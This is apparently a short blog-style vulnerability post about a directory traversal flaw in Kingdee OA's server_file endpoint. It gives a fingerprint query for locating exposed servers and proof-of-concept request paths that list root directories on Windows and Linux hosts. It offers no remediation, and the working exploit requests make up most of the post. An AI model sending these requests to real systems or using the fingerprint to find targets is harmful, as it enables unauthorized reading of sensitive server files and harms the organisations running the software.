Kingdee Oa Server_file Directory Traversal Vulnerability
Kingdee Oa Server_file Directory Traversal Vulnerability
Kingdee OA server_file directory traversal vulnerability
Vulnerability Description
Kingdee OA server_file has a directory traversal vulnerability. Attackers can obtain server sensitive information through directory traversal.
Vulnerability Impact
Kingdee OA
Network surveying and mapping
app=”Kingdee-EAS”
Vulnerability reappears
The login interface is
Vulnerable POC
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
This post is licensed under CC BY 4.0 by the author.